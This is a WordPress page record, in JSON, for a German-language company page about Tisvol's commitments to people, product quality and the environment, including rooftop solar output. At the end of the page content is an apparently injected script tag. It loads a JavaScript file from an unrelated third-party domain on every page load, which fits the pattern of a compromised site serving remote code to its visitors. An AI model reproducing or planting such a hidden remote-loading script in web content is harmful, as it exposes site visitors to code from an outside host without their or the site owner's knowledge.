{"id":11828,"date":"2019-05-17T11:53:43","date_gmt":"2019-05-17T09:53:43","guid":{"rendered":"https:\/\/tisvol.com\/wie-geht-das\/compromiso\/"},"modified":"2020-02-28T04:00:26","modified_gmt":"2020-02-28T04:00:26","slug":"engagement","status":"publish","type":"page","link":"https:\/\/tisvol.com\/de\/wie-geht-das\/engagement\/","title":{"rendered":"Engagement"},"content":{"rendered":"\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-33yw-fe4ace012c6b9c696b8bb8b31f28441a\">\n.avia-section.av-33yw-fe4ace012c6b9c696b8bb8b31f28441a{\nbackground-color:#ffffff;\nbackground-image:unset;\n}\n<\/style>\n<div id='tisvol-tagline'  class='avia-section av-33yw-fe4ace012c6b9c696b8bb8b31f28441a main_color avia-section-default avia-no-border-styling  avia-builder-el-0  el_before_av_section  avia-builder-el-first  avia-bg-style-scroll container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><main  role=\"main\" itemprop=\"mainContentOfPage\"  class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-11828'><div class='entry-content-wrapper clearfix'>\n<section  class='av_textblock_section av-jj8pzx7e-f58ee2657ad4a3ea48b2f1ff7d628b0b '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><h3 style=\"text-align: center;\">Powered by Superior Quality<\/h3>\n<\/div><\/section>\n\n<\/div><\/div><\/main><!-- close content main element --><\/div><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jjtt0w9i-6978ed90f6fef609d4f094b9d5e934d8\">\n.avia-section.av-jjtt0w9i-6978ed90f6fef609d4f094b9d5e934d8 .av-parallax .av-parallax-inner{\nbackground-repeat:no-repeat;\nbackground-image:url(https:\/\/tisvol.com\/wp-content\/uploads\/2019\/05\/fachada.jpg);\nbackground-position:50% 50%;\nbackground-attachment:scroll;\n}\n.avia-section.av-jjtt0w9i-6978ed90f6fef609d4f094b9d5e934d8 .av-section-color-overlay{\nopacity:0.8;\nbackground-color:#ffffff;\n}\n<\/style>\n<div id='av_section_2'  class='avia-section av-jjtt0w9i-6978ed90f6fef609d4f094b9d5e934d8 main_color avia-section-default avia-no-border-styling  avia-builder-el-2  el_after_av_section  el_before_av_section  animation-element avia-full-stretch av-parallax-section avia-bg-style-parallax av-section-color-overlay-active av-minimum-height av-minimum-height-50 av-height-50  container_wrap sidebar_right'  data-section-bg-repeat='stretch' data-av_minimum_height_pc='50' data-av_min_height_opt='50'><div class='av-parallax' data-avia-parallax-ratio='0.3' ><div class='av-parallax-inner main_color avia-full-stretch'><\/div><\/div><div class=\"av-section-color-overlay-wrap\"><div class=\"av-section-color-overlay\"><\/div><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-11828'><div class='entry-content-wrapper clearfix'>\n<section  class='av_textblock_section av-jj8rms6q-e378de6f514244f1a118e0085a2fbc7d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><div class=\"tisvol-diagonal\">\n<div><\/div>\n<\/div>\n<h2 class=\"titular-principal\" style=\"text-align: center;\">UNSER ENGAGEMENT<\/h2>\n<h4 class=\"subtitular-principal\" style=\"text-align: center;\">&#8211; WIR SIND VERPFLICHTEN UNS MIT UNSERER ARBEIT &#8211;<\/h4>\n<div class=\"tisvol-diagonal\">\n<div><\/div>\n<\/div>\n<\/div><\/section>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478\">\n#top .av_textblock_section.av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478 .avia_textblock{\ncolor:#333333;\n}\n<\/style>\n<section  class='av_textblock_section av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock appear-from-bottom av_inherit_color'  itemprop=\"text\" ><p style=\"text-align: center;\">Wir verpflichten uns <strong>mit den Personen.<\/strong><br \/>\nWir verpflichten uns <strong>mit unseren Produkten.<\/strong><br \/>\nWir verpflichten und <strong>mit der Umwelt.<\/strong><\/p>\n<\/div><\/section>\n\n<\/div><\/div><\/div><!-- close content main div --><\/div><\/div><\/div><div id='renovandonos'  class='avia-section av-jjgvfjza-d7029a59e2af802d8b04a24c6923a36a main_color avia-section-default avia-no-border-styling  avia-builder-el-5  el_after_av_section  el_before_av_section  gradient-grana border-top-fillet avia-bg-style-scroll av-minimum-height av-minimum-height-custom av-height-custom  container_wrap sidebar_right'   data-av_minimum_height_px='420'><div class='container av-section-cont-open' style='height:420px'><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-11828'><div class='entry-content-wrapper clearfix'>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-5fsy-4f428072adb752bd4df234841250c4e6\">\n.flex_column.av-5fsy-4f428072adb752bd4df234841250c4e6{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-5fsy-4f428072adb752bd4df234841250c4e6 av_one_fifth  avia-builder-el-6  el_before_av_three_fifth  avia-builder-el-first  first flex_column_div av-zero-column-padding  '     ><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-5fsy-f3c4f10f742777c86419bf6e7430934f\">\n.flex_column.av-5fsy-f3c4f10f742777c86419bf6e7430934f{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-5fsy-f3c4f10f742777c86419bf6e7430934f av_three_fifth  avia-builder-el-7  el_after_av_one_fifth  el_before_av_one_fifth  flex_column_div av-zero-column-padding  '     ><section  class='av_textblock_section av-jj8rms6q-bd76de550ec01b29325c9bd44a0927a3 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock somos-capaces'  itemprop=\"text\" ><p style=\"text-align: center;\">Dies ist die einzige Arbeitsweise, die wir kennen.<\/p>\n<\/div><\/section><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-5fsy-f3c4f10f742777c86419bf6e7430934f\">\n.flex_column.av-5fsy-f3c4f10f742777c86419bf6e7430934f{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-5fsy-f3c4f10f742777c86419bf6e7430934f av_one_fifth  avia-builder-el-9  el_after_av_three_fifth  avia-builder-el-last  flex_column_div av-zero-column-padding  '     ><\/div>\n\n<\/div><\/div><\/div><!-- close content main div --><\/div><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-juctc9lk-e1cd21694243f20f4329beae8a93bf05\">\n.avia-section.av-juctc9lk-e1cd21694243f20f4329beae8a93bf05 .av-parallax .av-parallax-inner{\nbackground-repeat:no-repeat;\nbackground-image:url(https:\/\/tisvol.com\/wp-content\/uploads\/2019\/05\/dron-tisvol.jpg);\nbackground-position:50% 50%;\nbackground-attachment:scroll;\n}\n.avia-section.av-juctc9lk-e1cd21694243f20f4329beae8a93bf05 .av-section-color-overlay{\nopacity:0.8;\nbackground-color:#ffffff;\n}\n<\/style>\n<div id='av_section_4'  class='avia-section av-juctc9lk-e1cd21694243f20f4329beae8a93bf05 main_color avia-section-large avia-no-border-styling  avia-builder-el-10  el_after_av_section  avia-builder-el-last  animation-element avia-full-stretch av-parallax-section avia-bg-style-parallax av-section-color-overlay-active av-minimum-height av-minimum-height-100 av-height-100  container_wrap sidebar_right'  data-section-bg-repeat='stretch' data-av_minimum_height_pc='100' data-av_min_height_opt='100'><div class='av-parallax' data-avia-parallax-ratio='0.3' ><div class='av-parallax-inner main_color avia-full-stretch'><\/div><\/div><div class=\"av-section-color-overlay-wrap\"><div class=\"av-section-color-overlay\"><\/div><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-11828'><div class='entry-content-wrapper clearfix'>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5\">\n#top .hr.hr-invisible.av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5{\nheight:100px;\n}\n<\/style>\n<div  class='hr av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5 hr-invisible  avia-builder-el-11  el_before_av_one_fifth  avia-builder-el-first '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n<div class='flex_column_table av-3zju-a453923abef5031a14b09c701fbfc17e sc-av_one_fifth av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-a453923abef5031a14b09c701fbfc17e\">\n.flex_column.av-3zju-a453923abef5031a14b09c701fbfc17e{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-a453923abef5031a14b09c701fbfc17e av_one_fifth  avia-builder-el-12  el_after_av_hr  el_before_av_three_fifth  light-text-block first flex_column_table_cell av-equal-height-column av-align-middle av-zero-column-padding  '     ><\/div><div class='av-flex-placeholder'><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-000350cf7fab50c8c183aedba2ea1869\">\n.flex_column.av-3zju-000350cf7fab50c8c183aedba2ea1869{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-000350cf7fab50c8c183aedba2ea1869 av_three_fifth  avia-builder-el-13  el_after_av_one_fifth  el_before_av_one_fifth  flex_column_table_cell av-equal-height-column av-align-middle av-zero-column-padding  '     ><section  class='av_textblock_section av-jj8rms6q-4bc08c9558570c781f6cb0f9e9b74202 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-bottom'  itemprop=\"text\" ><p><strong>Wir verpflichten uns<br \/>\nmit den Personen.<\/strong><\/p>\n<\/div><\/section><\/div><div class='av-flex-placeholder'><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-476eb52bc8e7cda163953059839deac7\">\n.flex_column.av-3zju-476eb52bc8e7cda163953059839deac7{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-476eb52bc8e7cda163953059839deac7 av_one_fifth  avia-builder-el-15  el_after_av_three_fifth  el_before_av_one_fifth  light-text-block flex_column_table_cell av-equal-height-column av-align-middle av-zero-column-padding  '     ><\/div><\/div><!--close column table wrapper. Autoclose: 1 --><div class='flex_column_table av-3zju-5559f5fe959093c9baa4321124844cbe sc-av_one_fifth av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-5559f5fe959093c9baa4321124844cbe\">\n.flex_column.av-3zju-5559f5fe959093c9baa4321124844cbe{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-5559f5fe959093c9baa4321124844cbe av_one_fifth  avia-builder-el-16  el_after_av_one_fifth  el_before_av_three_fifth  light-text-block first flex_column_table_cell av-equal-height-column av-align-top av-zero-column-padding  column-top-margin'     ><\/div><div class='av-flex-placeholder'><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-b32cf404abfe7ef6e83efc8b86cc237f\">\n.flex_column.av-3zju-b32cf404abfe7ef6e83efc8b86cc237f{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-b32cf404abfe7ef6e83efc8b86cc237f av_three_fifth  avia-builder-el-17  el_after_av_one_fifth  el_before_av_one_fifth  appear-from-right flex_column_table_cell av-equal-height-column av-align-top av-zero-column-padding  column-top-margin'     ><section  class='av_textblock_section av-jj8rms6q-a79b158b7c060fa617d04380157c6077 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock appear-from-bottom'  itemprop=\"text\" ><h3>Wir sind stets der \u00dcberzeugung gewesen, dass eine Beschr\u00e4nkung des <em>Transportkonzepts<\/em>, von einem Ort zu einem anderen zu gelangen, ein Fehler ist.<\/h3>\n<\/div><\/section><br \/>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478\">\n#top .av_textblock_section.av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478 .avia_textblock{\ncolor:#333333;\n}\n<\/style>\n<section  class='av_textblock_section av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock appear-from-bottom av_inherit_color'  itemprop=\"text\" ><p>Ein Transport kann mit viel Zeit einhergehen, mit vielen Stunden auf der Stra\u00dfe, mit der Beanspruchung durch die Be- und Entladevorg\u00e4nge \u2026 Diese Arbeiten verdienen ein hochwertiges Produkt. Daher sind wir davon \u00fcberzeugt, dass die Beschr\u00e4nkung eines <em>Tisvol<\/em> auf ein Fahrzeug ein Fehler ist.<\/p>\n<\/div><\/section><\/p><\/div><div class='av-flex-placeholder'><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-476eb52bc8e7cda163953059839deac7\">\n.flex_column.av-3zju-476eb52bc8e7cda163953059839deac7{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-476eb52bc8e7cda163953059839deac7 av_one_fifth  avia-builder-el-20  el_after_av_three_fifth  el_before_av_hr  light-text-block flex_column_table_cell av-equal-height-column av-align-top av-zero-column-padding  column-top-margin'     ><\/div><\/div><!--close column table wrapper. Autoclose: 1 -->\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5\">\n#top .hr.hr-invisible.av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5{\nheight:100px;\n}\n<\/style>\n<div  class='hr av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5 hr-invisible  avia-builder-el-21  el_after_av_one_fifth  el_before_av_one_fifth '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-025110f1caabe8e5714204edc172fb50\">\n.flex_column.av-3zju-025110f1caabe8e5714204edc172fb50{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-025110f1caabe8e5714204edc172fb50 av_one_fifth  avia-builder-el-22  el_after_av_hr  el_before_av_three_fifth  light-text-block first flex_column_div av-zero-column-padding  '     ><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-000350cf7fab50c8c183aedba2ea1869\">\n.flex_column.av-3zju-000350cf7fab50c8c183aedba2ea1869{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-000350cf7fab50c8c183aedba2ea1869 av_three_fifth  avia-builder-el-23  el_after_av_one_fifth  el_before_av_one_fifth  flex_column_div av-zero-column-padding  '     ><section  class='av_textblock_section av-jj8rms6q-4bc08c9558570c781f6cb0f9e9b74202 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-bottom'  itemprop=\"text\" ><p><strong>Wir verpflichten uns<br \/>\nmit unseren Produkten.<\/strong><\/p>\n<\/div><\/section><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-8c71ecb52560e58cbed2e13e2f12dbf2\">\n.flex_column.av-3zju-8c71ecb52560e58cbed2e13e2f12dbf2{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-8c71ecb52560e58cbed2e13e2f12dbf2 av_one_fifth  avia-builder-el-25  el_after_av_three_fifth  el_before_av_one_fifth  light-text-block flex_column_div av-zero-column-padding  '     ><\/div><div class='flex_column_table av-3zju-5559f5fe959093c9baa4321124844cbe sc-av_one_fifth av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-5559f5fe959093c9baa4321124844cbe\">\n.flex_column.av-3zju-5559f5fe959093c9baa4321124844cbe{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-5559f5fe959093c9baa4321124844cbe av_one_fifth  avia-builder-el-26  el_after_av_one_fifth  el_before_av_three_fifth  light-text-block first flex_column_table_cell av-equal-height-column av-align-top av-zero-column-padding  column-top-margin'     ><\/div><div class='av-flex-placeholder'><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-8c236619f135c39754f3ecaf47d12464\">\n.flex_column.av-3zju-8c236619f135c39754f3ecaf47d12464{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-8c236619f135c39754f3ecaf47d12464 av_three_fifth  avia-builder-el-27  el_after_av_one_fifth  el_before_av_one_fifth  appear-from-left flex_column_table_cell av-equal-height-column av-align-top av-zero-column-padding  column-top-margin'     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478\">\n#top .av_textblock_section.av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478 .avia_textblock{\ncolor:#333333;\n}\n<\/style>\n<section  class='av_textblock_section av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock appear-from-bottom av_inherit_color'  itemprop=\"text\" ><h3>Bei einer guten Arbeit ist jedes Teil wichtig. Es gibt viele L\u00f6sungen, aber nur eine ist f\u00fcr den jeweiligen Transport die zweckm\u00e4\u00dfige.<\/h3>\n<p>Daher garantieren wir den Einsatz der besten Materialien, um die Funktion unserer Produkte zu optimieren. Leichtigkeit, Sicherheit und Qualit\u00e4t sind die Werte, die uns am wichtigsten sind, und deren Sicherstellung motiviert uns, weiterhin jeden Tag unser Bestes zu geben.<\/p>\n<\/div><\/section><\/div><div class='av-flex-placeholder'><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-000350cf7fab50c8c183aedba2ea1869\">\n.flex_column.av-3zju-000350cf7fab50c8c183aedba2ea1869{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-000350cf7fab50c8c183aedba2ea1869 av_one_fifth  avia-builder-el-29  el_after_av_three_fifth  el_before_av_hr  flex_column_table_cell av-equal-height-column av-align-top av-zero-column-padding  column-top-margin'     ><\/div><\/div><!--close column table wrapper. Autoclose: 1 -->\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5\">\n#top .hr.hr-invisible.av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5{\nheight:100px;\n}\n<\/style>\n<div  class='hr av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5 hr-invisible  avia-builder-el-30  el_after_av_one_fifth  el_before_av_one_fifth '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-025110f1caabe8e5714204edc172fb50\">\n.flex_column.av-3zju-025110f1caabe8e5714204edc172fb50{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-025110f1caabe8e5714204edc172fb50 av_one_fifth  avia-builder-el-31  el_after_av_hr  el_before_av_three_fifth  light-text-block first flex_column_div av-zero-column-padding  '     ><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-000350cf7fab50c8c183aedba2ea1869\">\n.flex_column.av-3zju-000350cf7fab50c8c183aedba2ea1869{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-000350cf7fab50c8c183aedba2ea1869 av_three_fifth  avia-builder-el-32  el_after_av_one_fifth  el_before_av_one_fifth  flex_column_div av-zero-column-padding  '     ><section  class='av_textblock_section av-jj8rms6q-4bc08c9558570c781f6cb0f9e9b74202 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-bottom'  itemprop=\"text\" ><p><strong>Wir verpflichten und<br \/>\nmit der Umwelt.<\/strong><\/p>\n<\/div><\/section><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-476eb52bc8e7cda163953059839deac7\">\n.flex_column.av-3zju-476eb52bc8e7cda163953059839deac7{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-476eb52bc8e7cda163953059839deac7 av_one_fifth  avia-builder-el-34  el_after_av_three_fifth  el_before_av_one_fifth  light-text-block flex_column_div av-zero-column-padding  '     ><\/div><div class='flex_column_table av-3zju-5559f5fe959093c9baa4321124844cbe sc-av_one_fifth av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-5559f5fe959093c9baa4321124844cbe\">\n.flex_column.av-3zju-5559f5fe959093c9baa4321124844cbe{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-5559f5fe959093c9baa4321124844cbe av_one_fifth  avia-builder-el-35  el_after_av_one_fifth  el_before_av_three_fifth  light-text-block first flex_column_table_cell av-equal-height-column av-align-top av-zero-column-padding  column-top-margin'     ><\/div><div class='av-flex-placeholder'><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-b32cf404abfe7ef6e83efc8b86cc237f\">\n.flex_column.av-3zju-b32cf404abfe7ef6e83efc8b86cc237f{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-b32cf404abfe7ef6e83efc8b86cc237f av_three_fifth  avia-builder-el-36  el_after_av_one_fifth  el_before_av_one_fifth  appear-from-right flex_column_table_cell av-equal-height-column av-align-top av-zero-column-padding  column-top-margin'     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478\">\n#top .av_textblock_section.av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478 .avia_textblock{\ncolor:#333333;\n}\n<\/style>\n<section  class='av_textblock_section av-jj8rms6q-dea92f1f8aa66bd32921858422a7f478 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock appear-from-bottom av_inherit_color'  itemprop=\"text\" ><h3>Wir reduzieren die Umweltauswirkungen erheblich.<\/h3>\n<p>Wir setzen auf Solarenergie, was sich in 15.000 m2 auf den D\u00e4chern unserer Geb\u00e4ude installierten Solarzellen \u00e4u\u00dfert, die monatlich zwischen 90.000 kWh und 120.000 kWh erzeugen, ausreichend, um \u00fcber 370 Privathaushalte zu versorgen.<\/p>\n<\/div><\/section><\/div><div class='av-flex-placeholder'><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-000350cf7fab50c8c183aedba2ea1869\">\n.flex_column.av-3zju-000350cf7fab50c8c183aedba2ea1869{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-3zju-000350cf7fab50c8c183aedba2ea1869 av_one_fifth  avia-builder-el-38  el_after_av_three_fifth  el_before_av_hr  flex_column_table_cell av-equal-height-column av-align-top av-zero-column-padding  column-top-margin'     ><\/div><\/div><!--close column table wrapper. Autoclose: 1 -->\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5\">\n#top .hr.hr-invisible.av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5{\nheight:100px;\n}\n<\/style>\n<div  class='hr av-jjgyuavf-439a88421ccabfd3179569d29be5c9c5 hr-invisible  avia-builder-el-39  el_after_av_one_fifth  avia-builder-el-last '><span class='hr-inner '><span class=\"hr-inner-style\"><\/span><\/span><\/div>\n<\/div><\/div><\/div><!-- close content main div --><\/div><\/div><\/div><div id='after_section_4'  class='main_color av_default_container_wrap container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-11828'><div class='entry-content-wrapper clearfix'><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":11811,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-11828","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/tisvol.com\/de\/wp-json\/wp\/v2\/pages\/11828","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tisvol.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tisvol.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tisvol.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tisvol.com\/de\/wp-json\/wp\/v2\/comments?post=11828"}],"version-history":[{"count":0,"href":"https:\/\/tisvol.com\/de\/wp-json\/wp\/v2\/pages\/11828\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/tisvol.com\/de\/wp-json\/wp\/v2\/pages\/11811"}],"wp:attachment":[{"href":"https:\/\/tisvol.com\/de\/wp-json\/wp\/v2\/media?parent=11828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}